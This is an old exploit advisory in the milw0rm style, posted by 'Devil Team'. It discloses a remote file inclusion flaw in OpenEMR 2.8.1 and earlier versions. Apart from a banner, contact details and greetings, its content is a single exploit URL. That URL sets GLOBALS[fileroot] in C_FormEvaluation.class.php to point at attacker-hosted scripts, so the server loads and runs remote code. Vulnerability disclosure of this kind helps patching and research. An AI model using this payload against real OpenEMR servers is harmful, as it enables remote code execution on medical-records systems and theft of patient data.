$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ $$ $$ OpenEMR <= 2.8.1 Remote File Include Vulnerability $$ Script site: http://sourceforge.net/projects/openemr/ $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Find by: Kacper (a.k.a Rahim) $$ $$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$ $$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak, $$ Adam, DeathSpeed, Drzewko, pepi $$ $$ Specjal greetz: DragonHeart ;-) $$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Expl: http://www.site.com/[OpenEMR_path]/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=[evil_scripts] #Pozdro dla wszystkich ;-) # milw0rm.com [2006-06-07]